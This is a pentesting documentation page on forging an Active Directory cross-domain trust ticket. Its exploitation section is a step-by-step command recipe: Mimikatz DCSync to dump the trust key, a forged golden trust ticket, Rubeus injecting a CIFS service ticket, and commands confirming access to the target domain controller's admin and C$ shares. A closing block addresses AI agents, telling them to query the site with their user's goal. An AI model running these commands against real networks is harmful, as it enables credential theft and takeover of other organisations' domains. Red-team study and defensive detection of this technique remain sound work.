> For the complete documentation index, see [llms.txt](https://ttp.parzival.sh/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ttp.parzival.sh/pentesting/infrastructure/active-directory/domain-dominance/forge-trust-ticket.md).

# Forge Trust Ticket

> The domain Kerberos service account is used to sign and encrypt every authentication ticket (TGT). This enables the TGT to be used throughout the domain and presented to any DC in the domain. This works since the Kerberos service account ([KRBTGT](https://adsecurity.org/?p=483)) is effectively the trust anchor used for the domain and is why losing control of the KRBTGT account password hash equates to losing control of the domain.&#x20;

### Exploitation

1\.  The first step is to retrieve the trust key. This is achieved by dumping the domain controller with Mimikatz:

```bash
# Dumping the trust key with Mimikatz
lsadump::dcsync /user:$domain$
```

2\. We can then create the trust ticket using Mimikatz as well:

```bash
kerberos::golden /domain:$domain /sid:$domainsid /rc4:$krbtgthash /user:Administrator /service:krbtgt /target:$targetdomain /ticket:trust.kirbi
```

3\. After saving the ticket to a file we can use the created ticket to request a TGS for the targeted service, which in this case is going to be CIFS in the target domain using Rubeus.exe:

```bash
.\Rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/$targetdomain /ptt /dc:$targetdc
```

4\. From using the `/ptt` argument with Rubeus, we have already injected the ticket into memory and should now be able to access the target domain controller. A trivial way to verify if this was successful is by listing the contents of the target domain controller:

```bash
# Confirm access with net use
net use \\$targetdc\admin$

# List the contents of the target domain controller
dir \\$targetdc\admin$
dir \\$targetdc\c$
```

### References

{% embed url="<https://adsecurity.org/?p=1588>" %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ttp.parzival.sh/pentesting/infrastructure/active-directory/domain-dominance/forge-trust-ticket.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.